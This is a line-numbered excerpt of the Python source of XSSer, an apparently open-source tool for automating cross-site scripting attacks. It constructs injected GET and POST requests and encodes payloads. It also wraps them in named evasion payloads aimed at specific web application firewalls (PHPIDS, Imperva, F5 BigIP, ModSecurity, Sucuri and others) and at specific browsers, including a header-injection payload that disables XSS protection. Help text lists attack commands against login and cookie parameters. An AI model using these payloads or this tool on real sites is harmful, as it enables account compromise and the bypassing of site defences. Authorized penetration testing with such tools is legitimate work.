    496. 

  496.             elif options.dom:
    497. 

  497.                 payloads = payloads + payloads_dom
    498. 

  498.         elif options.dom:
    499. 

  499.             payloads = payloads_dom
    500. 

  500.         elif not options.fuzz and not options.dcp and not options.script and not options.hash and not options.inducedcode and not options.heuristic and not options.dom:
    501. 

  501.             payloads = [{"payload":'">PAYLOAD',
    502. 

  502. 			 "browser":"[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"
    503. 

  503.                          }]
    504. 

  504.         else:
    505. 

  505.             payloads = checker_payload
    506. 

  506.         return payloads
    507. 

  507. 

  508.     def process_ipfuzzing(self, text):
    509. 

  509.         """
    510. 

  510.         Mask ips in given text to DWORD
    511. 

  511.         """
    512. 

  512.         ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
    513. 

  513.         for ip in ips:
    514. 

  514.             text = text.replace(ip, str(self._ipDwordEncode(ip)))
    515. 

  515.         return text
    516. 

  516. 

  517.     def process_ipfuzzing_octal(self, text):
    518. 

  518.         """
    519. 

  519.        	Mask ips in given text to Octal
    520. 

  520. 	    """
    521. 

  521.         ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
    522. 

  522.         for ip in ips:
    523. 

  523.             text = text.replace(ip, str(self._ipOctalEncode(ip)))
    524. 

  524.         return text
    525. 

  525. 

  526.     def process_payloads_ipfuzzing(self, payloads):
    527. 

  527.         """
    528. 

  528.         Mask ips for all given payloads using DWORD
    529. 

  529.         """
    530. 

  530.         # ip fuzzing (DWORD)
    531. 

  531.         if self.options.Dwo:
    532. 

  532.             resulting_payloads = []
    533. 

  533.             for payload in payloads:
    534. 

  534.                 payload["payload"] = self.process_ipfuzzing(payload["payload"])
    535. 

  535.                 resulting_payloads.append(payload)
    536. 

  536.             return resulting_payloads
    537. 

  537.         return payloads
    538. 

  538. 

  539.     def process_payloads_ipfuzzing_octal(self, payloads):
    540. 

  540.         """
    541. 

  541.         Mask ips for all given payloads using OCTAL
    542. 

  542.         """
    543. 

  543.         # ip fuzzing (OCTAL)
    544. 

  544.         if self.options.Doo:
    545. 

  545.             resulting_payloads = []
    546. 

  546.             for payload in payloads:
    547. 

  547.                 payload["payload"] = self.process_ipfuzzing_octal(payload["payload"])
    548. 

  548.                 resulting_payloads.append(payload)
    549. 

  549.             return resulting_payloads
    550. 

  550.         return payloads
    551. 

  551. 

  552.     def get_query_string(self):
    553. 

  553.         """
    554. 

  554.         Get the supplied query string.
    555. 

  555.         """
    556. 

  556.         if self.options.postdata:
    557. 

  557.             return self.options.postdata
    558. 

  558.         elif self.options.getdata:
    559. 

  559.             return self.options.getdata
    560. 

  560.         return ""
    561. 

  561. 

  562.     def attack_url(self, url, payloads, query_string):
    563. 

  563.         """
    564. 

  564.         Attack the given url checking or not if is correct.
    565. 

  565.         """
    566. 

  566.         if not self.options.nohead:
    567. 

  567.             for payload in payloads:
    568. 

  568.                 self.rounds = self.rounds + 1
    569. 

  569.                 self.attack_url_payload(url, payload, query_string)
    570. 

  570.         else:
    571. 

  571.             hc = Curl()
    572. 

  572.             try:
    573. 

  573.                 urls = hc.do_head_check([url])
    574. 

  574.             except:
    575. 

  575.                 self.report("[Error] Target URL: (" + url + ") is malformed!" + " [DISCARDED]" + "\n")
    576. 

  576.                 return
    577. 

  577.             self.report("-"*50 + "\n")
    578. 

  578.             if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
    579. 

  579.                 if str(hc.info()["http-code"]) in ["301"]:
    580. 

  580.                     url = str(hc.info()["Location"])
    581. 

  581.                     payload = ""
    582. 

  582.                     query_string = ""
    583. 

  583.                 elif str(hc.info()["http-code"]) in ["302"]:
    584. 

  584.                     url = url + "/"
    585. 

  585.                     payload = ""
    586. 

  586.                     query_string = ""
    587. 

  587.                 self.success_connection = self.success_connection + 1
    588. 

  588.                 self.report("[Info] HEAD-CHECK: OK! [HTTP-" + hc.info()["http-code"] + "] -> [AIMED]\n")
    589. 

  589.                 for payload in payloads:
    590. 

  590.                     self.attack_url_payload(url, payload, query_string)
    591. 

  591.             else:
    592. 

  592.                 if str(hc.info()["http-code"]) in ["405"]:
    593. 

  593.                     self.report("[Info] HEAD-CHECK: NOT ALLOWED! [HTTP-" + hc.info()["http-code"] + "] -> [PASSING]\n")
    594. 

  594.                     self.success_connection = self.success_connection + 1
    595. 

  595.                     for payload in payloads:
    596. 

  596.                         self.attack_url_payload(url, payload, query_string)
    597. 

  597.                 else:
    598. 

  598.                     self.not_connection = self.not_connection + 1
    599. 

  599.                     self.report("[Error] HEAD-CHECK: FAILED! [HTTP-" + hc.info()["http-code"] + "] -> [DISCARDED]\n")
    600. 

  600.             self.report("-"*50 + "\n")
    601. 

  601. 

  602.     def not_keyword_exit(self):
    603. 

  603.         self.report("="*30)
    604. 

  604.         self.report("\n[Error] XSSer cannot find a correct place to start an attack. Aborting!...\n")
    605. 

  605.         self.report("-"*25)
    606. 

  606.         self.report("\n[Info] This is because you aren't providing:\n\n At least one -payloader- using a keyword: 'XSS' (for hex.hash) or 'X1S' (for int.hash):\n")
    607. 

  607.         self.report("  - ex (GET): xsser -u 'https://target.com' -g '/path/profile.php?username=bob&surname=XSS&age=X1S&job=XSS'")
    608. 

  608.         self.report("  - ex (POST): xsser -u 'https://target.com/login.php' -p 'username=bob&password=XSS&captcha=X1S'\n")
    609. 

  609.         self.report(" Any extra attack(s) (Xsa, Xsr, Coo, Dorker, Crawler...):\n")
    610. 

  610.         self.report("  - ex (GET+Cookie): xsser -u 'https://target.com' -g '/path/id.php?=2' --Coo")
    611. 

  611.         self.report("  - ex (POST+XSA+XSR+Cookie): xsser -u 'https://target.com/login.php' -p 'username=admin&password=admin' --Xsa --Xsr --Coo")
    612. 

  612.         self.report("  - ex (Dorker): xsser -d 'news.php?id=' --Da")
    613. 

  613.         self.report("  - ex (Crawler): xsser -u 'https://target.com' -c 100 --Cl\n")
    614. 

  614.         self.report(" Or a mixture:\n")
    615. 

  615.         self.report("  - ex (GET+Manual): xsser -u 'https://target.com' -g '/users/profile.php?user=XSS&salary=X1S' --payload='<script>alert(XSS);</script>'")
    616. 

  616.         self.report("  - ex (POST+Manual): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --payload='}}%%&//<sc&ri/pt>(XSS)--;>'\n")
    617. 

  617.         self.report("  - ex (GET+Cookie): xsser -u 'https://target.com' -g '/login.asp?user=bob&password=XSS' --Coo")
    618. 

  618.         self.report("  - ex (POST+XSR+XSA): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --Xsr --Xsa\n")
    619. 

  619.         self.report("="*75 + "\n")
    620. 

  620.         if not self.options.xsser_gtk:
    621. 

  621.             sys.exit(2)
    622. 

  622.         else:
    623. 

  623.             pass
    624. 

  624. 

  625.     def get_url_payload(self, url, payload, query_string, user_attack_payload):
    626. 

  626.         """
    627. 

  627.         Attack the given url with the given payload
    628. 

  628.         """
    629. 

  629.         options = self.options
    630. 

  630.         self._ongoing_attacks = {}
    631. 

  631.         if (self.options.xsa or self.options.xsr or self.options.coo):
    632. 

  632.             agent, referer, cookie  = self._prepare_extra_attacks(payload)
    633. 

  633.         else:
    634. 

  634.             agents = [] # user-agents
    635. 

  635.             try:
    636. 

  636.                 f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
    637. 

  637.             except:
    638. 

  638.                 f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
    639. 

  639.             for line in f:
    640. 

  640.                 agents.append(line)
    641. 

  641.             agent = random.choice(agents).strip() # set random user-agent
    642. 

  642.             referer = "127.0.0.1"
    643. 

  643.             cookie = None
    644. 

  644. 

  645.         if options.agent:
    646. 

  646.             agent = options.agent
    647. 

  647.         else:
    648. 

  648.             self.options.agent = agent
    649. 

  649.         if options.referer:
    650. 

  650.             referer = options.referer
    651. 

  651.         else:
    652. 

  652.             self.options.referer = referer
    653. 

  653.         if options.cookie:
    654. 

  654.             cookie = options.cookie
    655. 

  655.         else:
    656. 

  656.             self.options.cookie = cookie
    657. 

  657. 

  658.         # get payload/vector
    659. 

  659.         payload_string = payload['payload'].strip()
    660. 

  660.   
    661. 

  661.         ### Anti-antiXSS exploits
    662. 

  662.         # PHPIDS (>0.6.5) [ALL] -> 32*payload + payload
    663. 

  663.         if options.phpids065:
    664. 

  664.             payload_string = 32*payload_string + payload_string
    665. 

  665. 

  666.         # PHPIDS (>0.7) [ALL] -> payload: 'svg-onload' (23/04/2016)
    667. 

  667.         if options.phpids070:
    668. 

  668.             payload_string = '<svg+onload=+"'+payload_string+'">'
    669. 

  669. 

  670.         # Imperva Incapsula [ALL] -> payload: 'img onerror' + payload[DoubleURL+HTML+Unicode] 18/02/2016 
    671. 

  671.         if options.imperva:
    672. 

  672.             payload_string = '<img src=x onerror="'+payload_string+'">'
    673. 

  673. 

  674.         # WebKnight (>4.1) [Chrome] payload: 'details ontoggle' 18/02/2016 
    675. 

  675.         if options.webknight:
    676. 

  676.             payload_string = '<details ontoggle='+payload_string+'>'
    677. 

  677. 

  678.         # F5BigIP [Chrome+FF+Opera] payload: 'onwheel' 18/02/2016 
    679. 

  679.         if options.f5bigip:
    680. 

  680.             payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
    681. 

  681.  
    682. 

  682.         # Barracuda WAF [ALL] payload: 'onwheel' 18/02/2016 
    683. 

  683.         if options.barracuda:
    684. 

  684.             payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
    685. 

  685. 

  686.         # Apache / modsec [ALL] payload: special 18/02/2016 
    687. 

  687.         if options.modsec:
    688. 

  688.             payload_string = '<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover='+payload_string+'>'
    689. 

  689. 

  690.         # QuickDefense [Chrome] payload: 'ontoggle' + payload[Unicode] 18/02/2016 
    691. 

  691.         if options.quickdefense:
    692. 

  692.             payload_string = '<details ontoggle="'+payload_string+'">'
    693. 

  693.         
    694. 

  694.         # SucuriWAF [ALL] payload: 'ontoggle' + payload[Unicode] 18/02/2016 
    695. 

  695.         if options.sucuri:
    696. 

  696.            payload_string = '<a+id="a"href=javascript%26colon;alert%26lpar;'+payload_string+'%26rpar;+id="a" style=width:100%25;height:100%25;position:fixed;left:0;top:0 x>Y</a>'
    697. 

  697. 

  698.         # Firefox 12 (and below) # 09/2019
    699. 

  699.         if options.firefox:
    700. 

  700.             payload_string = "<script type ='text/javascript'>"+payload_string+"</script>"
    701. 

  701. 

  702.         # Chrome 19 (and below, but also Firefox 12 and below) # 09/2019
    703. 

  703.         if options.chrome:
    704. 

  704.             payload_string = "<script>/*///*/"+payload_string+"</script>"
    705. 

  705. 

  706.         # Internet Explorer 9 (but also Firefox 12 and below) # 09/2019
    707. 

  707.         if options.iexplorer:
    708. 

  708.             payload_string = 'cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>'+payload_string+'</script></body></html>'
    709. 

  709. 

  710.         # Opera 10.6 (but also IE6) # 09/2019
    711. 

  711.         if options.opera:
    712. 

  712.             payload_string = "<Table background = javascript: alert ("+payload_string+")> </ table>"
    713. 

  713. 

  714.         # Substitute the attacking hash
    715. 

  715.         if 'PAYLOAD' in payload_string or 'VECTOR' in payload_string:
    716. 

  716.             payload_string = payload_string.replace('PAYLOAD', self.DEFAULT_XSS_PAYLOAD)
    717. 

  717.             payload_string = payload_string.replace('VECTOR', self.DEFAULT_XSS_PAYLOAD)
    718. 

  718. 

  719.         hashed_payload = payload_string
    720. 

  720. 

  721.         # Imperva
    722. 

  722.         if options.imperva:
    723. 

  723.             hashed_payload = urllib.parse.urlencode({'':hashed_payload})
    724. 

  724.             hashed_payload = urllib.parse.urlencode({'':hashed_payload}) #DoubleURL encoding
    725. 

  725.             hashed_payload = cgi.escape(hashed_payload) # + HTML encoding
    726. 

  726.             hashed_payload = str(hashed_payload) # + Unicode
    727. 

  727. 

  728.         # Quick Defense
    729. 

  729.         if options.quickdefense:
    730. 

  730.             hashed_payload = str(hashed_payload) # + Unicode
    731. 

  731. 

  732.         # apply user final attack url payload
    733. 

  733.         if user_attack_payload:
    734. 

  734.             hashed_vector_url = self.encoding_permutations(user_attack_payload)
    735. 

  735.         else:
    736. 

  736.             hashed_vector_url = self.encoding_permutations(hashed_payload)
    737. 

  737. 

  738.         # replace special payload string also for extra attacks
    739. 

  739.         if self.extra_hashed_injections:
    740. 

  740.             hashed_payload = hashed_payload.replace('XSS', 'PAYLOAD')
    741. 

  741.             for k, v in self.extra_hashed_injections.items():
    742. 

  742.                 if v[1] in hashed_payload:
    743. 

  743.                     self.extra_hashed_vector_url[k] = v[0], hashed_payload
    744. 

  744.             self.extra_hashed_injections = self.extra_hashed_vector_url
    745. 

  745.         if not options.getdata: # using GET as a single input (-u)
    746. 

  746.             target_url = url
    747. 

  747.         else:
    748. 

  748.             if not url.endswith("/") and not options.getdata.startswith("/"):
    749. 

  749.                 url = url + "/"
    750. 

  750.             target_url = url + options.getdata
    751. 

  751.         p_uri = urlparse(target_url)
    752. 

  752.         uri = p_uri.netloc
    753. 

  753.         path = p_uri.path
    754. 

  754.         if not uri.endswith('/') and not path.startswith('/'):
    755. 

  755.             uri = uri + "/"
    756. 

  756.         if self.options.target or self.options.crawling: # for audit entire target allows target without 'XSS/X1S' keyword
    757. 

  757.             if not "XSS" in target_url:
    758. 

  758.                 if not target_url.endswith("/"):
    759. 

  759.                     target_url = target_url + "/XSS"
    760. 

  760.                 else:
    761. 

  761.                     target_url = target_url + "XSS"
    762. 

  762.         target_params = parse_qs(urlparse(target_url).query, keep_blank_values=True)
    763. 

  763.         if self.options.script:
    764. 

  764.             if not 'XSS' in self.options.script and not self.options.crawling: # 'XSS' keyword used to change PAYLOAD at target_params
    765. 

  765.                 self.not_keyword_exit()
    766. 

  766.         if not target_params and not options.postdata:
    767. 

  767.             if not self.options.xsa and not self.options.xsr and not self.options.coo: # extra attacks payloads
    768. 

  768.                 if not 'XSS' in target_url and not 'X1S' in target_url and not self.options.crawling: # not any payloader found!
    769. 

  769.                     self.not_keyword_exit()
    770. 

  770.                 else: # keyword found at target url (ex: https://target.com/XSS)
    771. 

  771.                     if 'XSS' in target_url:
    772. 

  772.                         url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
    773. 

  773.                     elif 'X1S' in target_url:
    774. 

  774.                         url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
    775. 

  775.                     hashed_payload = payload_string.replace('XSS', url_orig_hash)
    776. 

  776.                     if "[B64]" in hashed_payload: # [DCP Injection]
    777. 

  777.                         dcp_payload = hashed_payload.split("[B64]")[1]
    778. 

  778.                         dcp_preload = hashed_payload.split("[B64]")[0]
    779. 

  779.                         dcp_payload = b64encode(dcp_payload)
    780. 

  780.                         hashed_payload = dcp_preload + dcp_payload
    781. 

  781.                     self.hashed_injections[url_orig_hash] = target_url
    782. 

  782.                     if user_attack_payload:
    783. 

  783.                         pass
    784. 

  784.                     else:
    785. 

  785.                         hashed_vector_url = self.encoding_permutations(hashed_payload)
    786. 

  786.                     target_params[''] = hashed_vector_url # special target_param when XSS only at target_url
    787. 

  787.                     target_url_params = urllib.parse.urlencode(target_params)
    788. 

  788.                     if not uri.endswith('/') and not path.startswith('/'):
    789. 

  789.                         uri = uri + "/"
    790. 

  790.                     dest_url = p_uri.scheme + "://" + uri + path
    791. 

  791.                     if not "XSS" in dest_url:
    792. 

  792.                         if not dest_url.endswith("/"):
    793. 

  793.                             dest_url = dest_url + "/" + hashed_vector_url
    794. 

  794.                         else:
    795. 

  795.                             dest_url = dest_url + hashed_vector_url
    796. 

  796.                     else:
    797. 

  797.                         if 'XSS' in dest_url:
    798. 

  798.                             dest_url = dest_url.replace('XSS', hashed_vector_url)
    799. 

  799.                         if 'X1S' in dest_url:
    800. 

  800.                             dest_url = dest_url.replace('X1S', hashed_vector_url)
    801. 

  801.             else:
    802. 

  802.                 if 'XSS' in target_url:
    803. 

  803.                     url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
    804. 

  804.                 elif 'X1S' in target_url:
    805. 

  805.                     url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
    806. 

  806.                 hashed_payload = payload_string.replace('XSS', url_orig_hash)
    807. 

  807.                 if "[B64]" in hashed_payload: # [DCP Injection]
    808. 

  808.                     dcp_payload = hashed_payload.split("[B64]")[1]
    809. 

  809.                     dcp_preload = hashed_payload.split("[B64]")[0]
    810. 

  810.                     dcp_payload = b64encode(dcp_payload)
    811. 

  811.                     hashed_payload = dcp_preload + dcp_payload
    812. 

  812.                 self.hashed_injections[url_orig_hash] = target_url
    813. 

  813.                 if user_attack_payload:
    814. 

  814.                     pass
    815. 

  815.                 else:
    816. 

  816.                     hashed_vector_url = self.encoding_permutations(hashed_payload)
    817. 

  817.                 target_params[''] = hashed_vector_url # special target_param when XSS only at target_url
    818. 

  818.                 target_url_params = urllib.parse.urlencode(target_params)
    819. 

  819.                 if not uri.endswith('/') and not path.startswith('/'):
    820. 

  820.                     uri = uri + "/"
    821. 

  821.                 dest_url = p_uri.scheme + "://" + uri + path
    822. 

  822.                 if 'XSS' in dest_url:
    823. 

  823.                     dest_url = dest_url.replace('XSS', hashed_vector_url)
    824. 

  824.                 if 'X1S' in dest_url:
    825. 

  825.                     dest_url = dest_url.replace('X1S', hashed_vector_url)
    826. 

  826.                 dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
    827. 

  827.         else:
    828. 

  828.             if not options.postdata:
    829. 

  829.                 r = 0
    830. 

  830.                 for key, value in target_params.items(): # parse params searching for keywords
    831. 

  831.                     for v in value:
    832. 

  832.                         if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload
    833. 

  833.                             if v == 'XSS':
    834. 

  834.                                 url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
    835. 

  835.                             elif v == 'X1S':
    836. 

  836.                                 url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
    837. 

  837.                             hashed_payload = payload_string.replace('XSS', url_orig_hash)
    838. 

  838.                             if "[B64]" in hashed_payload: # [DCP Injection]
    839. 

  839.                                 dcp_payload = hashed_payload.split("[B64]")[1]
    840. 

  840.                                 dcp_preload = hashed_payload.split("[B64]")[0]
    841. 

  841.                                 dcp_payload = b64encode(dcp_payload)
    842. 

  842.                                 hashed_payload = dcp_preload + dcp_payload
    843. 

  843.                             self.hashed_injections[url_orig_hash] = key
    844. 

  844.                             if user_attack_payload:
    845. 

  845.                                 pass
    846. 

  846.                             else:
    847. 

  847.                                 hashed_vector_url = self.encoding_permutations(hashed_payload)
    848. 

  848.                             target_params[key] = hashed_vector_url
    849. 

  849.                             r = r + 1
    850. 

  850.                         else:
    851. 

  851.                             if self.options.xsa or self.options.xsr or self.options.coo:
    852. 

  852.                                 url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
    853. 

  853.                                 self.hashed_injections[url_orig_hash] = key
    854. 

  854.                                 target_params[key] = v
    855. 

  855.                                 r = r + 1
    856. 

  856.                             else:
    857. 

  857.                                 target_params[key] = v
    858. 

  858.                 if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling:
    859. 

  859.                     self.not_keyword_exit()
    860. 

  860.                 payload_url = query_string.strip() + hashed_vector_url
    861. 

  861.                 target_url_params = urllib.parse.urlencode(target_params)
    862. 

  862.                 dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
    863. 

  863.             else: # using POST provided by parameter (-p)
    864. 

  864.                 target_params = parse_qs(query_string, keep_blank_values=True)
    865. 

  865.                 r = 0
    866. 

  866.                 for key, value in target_params.items(): # parse params searching for keywords
    867. 

  867.                     for v in value:
    868. 

  868.                         if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload
    869. 

  869.                             if v == 'XSS':
    870. 

  870.                                 url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
    871. 

  871.                             elif v == 'X1S':
    872. 

  872.                                 url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
    873. 

  873.                             hashed_payload = payload_string.replace('XSS', url_orig_hash)
    874. 

  874.                             if "[B64]" in hashed_payload: # [DCP Injection]
    875. 

  875.                                 dcp_payload = hashed_payload.split("[B64]")[1]
    876. 

  876.                                 dcp_preload = hashed_payload.split("[B64]")[0]
    877. 

  877.                                 dcp_payload = b64encode(dcp_payload)
    878. 

  878.                                 hashed_payload = dcp_preload + dcp_payload
    879. 

  879.                             self.hashed_injections[url_orig_hash] = key
    880. 

  880.                             if user_attack_payload:
    881. 

  881.                                 pass
    882. 

  882.                             else:
    883. 

  883.                                 hashed_vector_url = self.encoding_permutations(hashed_payload)
    884. 

  884.                             target_params[key] = hashed_vector_url
    885. 

  885.                             r = r + 1
    886. 

  886.                         else:
    887. 

  887.                             if self.options.xsa or self.options.xsr or self.options.coo:
    888. 

  888.                                 url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
    889. 

  889.                                 self.hashed_injections[url_orig_hash] = key
    890. 

  890.                                 target_params[key] = v
    891. 

  891.                                 r = r + 1
    892. 

  892.                             else:
    893. 

  893.                                 target_params[key] = v
    894. 

  894.                 if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling:
    895. 

  895.                     self.not_keyword_exit()
    896. 

  896.                 target_url_params = urllib.parse.urlencode(target_params)
    897. 

  897.                 dest_url = target_url_params
    898. 

  898.         self._ongoing_attacks['url'] = url_orig_hash
    899. 

  899.         return dest_url, agent, referer, cookie
    900. 

  900. 

  901.     def attack_url_payload(self, url, payload, query_string):
    902. 

  902.         if not self.pool:
    903. 

  903.             pool = self.mothership.pool
    904. 

  904.         else:
    905. 

  905.             pool = self.pool
    906. 

  906.         c = Curl()
    907. 

  907.         if self.options.getdata or not self.options.postdata:
    908. 

  908.             dest_url, agent, referer, cookie = self.get_url_payload(url, payload, query_string, None)
    909. 

  909.             def _cb(request, result):
    910. 

  910.                 self.finish_attack_url_payload(c, request, result, payload,
    911. 

  911.                                                query_string, url, dest_url)
    912. 

  912.             _error_cb = self.error_attack_url_payload
    913. 

  913.             def _error_cb(request, error):
    914. 

  914.                 self.error_attack_url_payload(c, url, request, error)
    915. 

  915.             c.agent = agent
    916. 

  916.             c.referer = referer
    917. 

  917.             c.cookie = cookie
    918. 

  918.             if " " in dest_url: # parse blank spaces
    919. 

  919.                 dest_url = dest_url.replace(" ", "+")
    920. 

  920.             pool.addRequest(c.get, [[dest_url]], _cb, _error_cb)
    921. 

  921.             self._ongoing_requests += 1
    922. 

  922.         if self.options.postdata:
    923. 

  923.             dest_url, agent, referer, cookie = self.get_url_payload("", payload, query_string, None)
    924. 

  924.             def _cb(request, result):
    925. 

  925.                 self.finish_attack_url_payload(c, request, result, payload,
    926. 

  926.                                                query_string, url, dest_url)
    927. 

  927.             _error_cb = self.error_attack_url_payload
    928. 

  928.             def _error_cb(request, error):
    929. 

  929.                 self.error_attack_url_payload(c, url, request, error)
    930. 

  930.             dest_url = dest_url.strip().replace("/", "", 1)
    931. 

  931.             c.agent = agent
    932. 

  932.             c.referer = referer
    933. 

  933.             c.cookie = cookie
    934. 

  934.             pool.addRequest(c.post, [[url, dest_url]], _cb, _error_cb)
    935. 

  935.             self._ongoing_requests += 1
    936. 

  936. 

  937. 

  938.     def error_attack_url_payload(self, c, url, request, error):
    939. 

  939.         self._ongoing_requests -= 1
    940. 

  940.         for reporter in self._reporters:
    941. 

  941.             reporter.mosquito_crashed(url, str(error[0]))
    942. 

  942.         dest_url = request.args[0]
    943. 

  943.         self.report("Failed attempt (URL Malformed!?): " + url + "\n")
    944. 

  944.         self.urlmalformed = True
    945. 

  945.         if self.urlmalformed == True and self.urlspoll[0] == url:
    946. 

  946.             self.land()
    947. 

  947.         self.report(str(error[0]))
    948. 

  948.         if self.options.verbose:
    949. 

  949.             traceback.print_tb(error[2])
    950. 

  950.         c.close()
    951. 

  951.         del c
    952. 

  952.         return
    953. 

  953. 

  954.     def finish_attack_url_payload(self, c, request, result, payload,
    955. 

  955.                                   query_string, url, dest_url):
    956. 

  956.         self.round_complete = self.round_complete + 1
    957. 

  957.         self.report("="*75)
    958. 

  958.         self.report("[*] Test: [ "+str(self.round_complete)+"/"+str(self.rounds)+" ] <-> "+str(self.time))
    959. 

  959.         self.report("="*75)
    960. 

  960.         self.report("\n[+] Target: \n\n [ "+ str(url) + " ]\n")
    961. 

  961.         self._ongoing_requests -= 1
    962. 

  962.         # adding constant head check number flag
    963. 

  963.         if self.options.isalive:
    964. 

  964.             self.flag_isalive_num = int(self.options.isalive)
    965. 

  965.         if not self.options.isalive:
    966. 

  966.            pass
    967. 

  967.         elif self.options.isalive and not self.options.nohead:
    968. 

  968.             self.errors_isalive = self.errors_isalive + 1
    969. 

  969.             if self.errors_isalive > self.options.isalive:
    970. 

  970.                 pass
    971. 

  971.             else:
    972. 

  972.                 self.report("---------------------")
    973. 

  973.                 self.report("Alive Checker for: " + url + " - [", self.errors_isalive, "/", self.options.isalive, "]\n")
    974. 

  974.             if self.next_isalive == True:
    975. 

  975.                 hc = Curl()
    976. 

  976.                 self.next_isalive = False
    977. 

  977.                 try:
    978. 

  978.                     urls = hc.do_head_check([url])
    979. 

  979.                 except:
    980. 

  980.                     print("[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n")
    981. 

  981.                     self.errors_isalive = 0
    982. 

  982.                     return
    983. 

  983.                 if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
    984. 

  984.                     print("HEAD alive check: OK" + "(" + hc.info()["http-code"] + ")\n")
    985. 

  985.                     print("- Your target still Alive: " + "(" + url + ")")
    986. 

  986.                     print("- If you are receiving continuous 404 errors requests on your injections but your target is alive is because:\n")
    987. 

  987.                     print("          - your injections are failing: normal :-)")
    988. 

  988.                     print("          - maybe exists some IPS/NIDS/... systems blocking your requests!\n")
    989. 

  989.                 else:
    990. 

  990.                     if str(hc.info()["http-code"]) == "0":
    991. 

  991.                         print("\n[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n")
    992. 

  992.                     else:
    993. 

  993.                         print("HEAD alive check: FAILED" + "(" + hc.info()["http-code"] + ")\n")
    994. 

  994.                         print("- Your target " + "(" + url + ")" + " looks that is NOT alive")
    995. 

  995.                         print("- If you are receiving continuous 404 errors requests on payloads\n  and this HEAD pre-check request is giving you another 404\n  maybe is because; target is down, url malformed, something is blocking you...\n- If you haven't more than one target then try to; STOP THIS TEST!!\n")
    996. 

  996.                 self.errors_isalive = 0
    997. 

  997.             else:
    998. 

  998.                 if str(self.errors_isalive) >= str(self.options.isalive):
    999. 

  999.                     self.report("---------------------")
    1000. 

  1000.                     self.report("\nAlive System: XSSer is checking if your target still alive. [Waiting for reply...]\n")
    1001. 

  1001.                     self.next_isalive = True
    1002. 

  1002.                     self.options.isalive = self.flag_isalive_num
    1003. 

  1003.         else:
    1004. 

  1004.             if self.options.isalive and self.options.nohead:
    1005. 

  1005.                 self.report("---------------------")
    1006. 

  1006.                 self.report("Alive System DISABLED!: XSSer is using a pre-check HEAD request per target by default to perform better accurance on tests\nIt will check if target is alive before inject all the payloads. try (--no-head) with (--alive <num>) to control this checker limit manually")
    1007. 

  1007.                 self.report("---------------------")
    1008. 

  1008.         # check results an alternative url, choosing method and parameters, or not
    1009. 

  1009.         if self.options.altm == None or self.options.altm not in ["GET", "POST", "post"]:
    1010. 

  1010.             self.options.altm = "GET"
    1011. 

  1011.         if self.options.altm == "post":
    1012. 

  1012.             self.options.altm = "POST"
    1013. 

  1013.         if self.options.alt == None:
    1014. 

  1014.             pass
    1015. 

  1015.         else:
    1016. 

  1016.             self.report("="*45)
    1017. 

  1017.             self.report("[+] Checking Response Options:", "\n")
    1018. 

  1018.             self.report("[+] Url:", self.options.alt)
    1019. 

  1019.             self.report("[-] Method:", self.options.altm)
    1020. 

  1020.             if self.options.ald:
    1021. 

  1021.                 self.report("[-] Parameter(s):", self.options.ald, "\n")
    1022. 

  1022.             else:
    1023. 

  1023.                 self.report("[-] Parameter(s):", query_string, "\n")
    1024. 

  1024.         if c.info()["http-code"] in ["200", "302", "301"]:
    1025. 

  1025.             if self.options.statistics:
    1026. 

  1026.                 self.success_connection = self.success_connection + 1
    1027. 

  1027.             self._report_attack_success(c, dest_url, payload,
    1028. 

  1028.                                         query_string, url)
    1029. 

  1029.         else:
    1030. 

  1030.             self._report_attack_failure(c, dest_url, payload,
    1031. 

  1031.                                         query_string, url)
    1032. 

  1032.         # checking response results 
    1033. 

  1033.         if self.options.alt == None:
    1034. 

  1034.             pass
    1035. 

  1035.         else:
    1036. 

  1036.             self.report("="*45)
    1037. 

  1037.             self.report("[+] Checking Response Results:", "\n")
    1038. 

  1038.             self.report("Searching using", self.options.altm, "for:", orig_hash, "on alternative url")
    1039. 

  1039.             if 'PAYLOAD' in payload['payload']:
    1040. 

  1040.                 user_attack_payload = payload['payload'].replace('PAYLOAD', orig_hash)
    1041. 

  1041.             if self.options.ald:
    1042. 

  1042.                 query_string = self.options.ald
    1043. 

  1043.             if "VECTOR" in self.options.alt:
    1044. 

  1044.                 dest_url = self.options.alt
    1045. 

  1045.             else:
    1046. 

  1046.                 if not dest_url.endswith("/"):
    1047. 

  1047.                     dest_url = dest_url + "/"
    1048. 

  1048.             if self.options.altm == 'POST':
    1049. 

  1049.                 dest_url = "" + query_string + user_attack_payload
    1050. 

  1050.                 dest_url = dest_url.strip().replace("/", "", 1)
    1051. 

  1051.                 data = c.post(url, dest_url)
    1052. 

  1052.             else:
    1053. 

  1053.                 dest_url = self.options.alt + query_string + user_attack_payload
    1054. 

  1054.                 c.get(dest_url)
    1055. 

  1055.             # perform check response injection
    1056. 

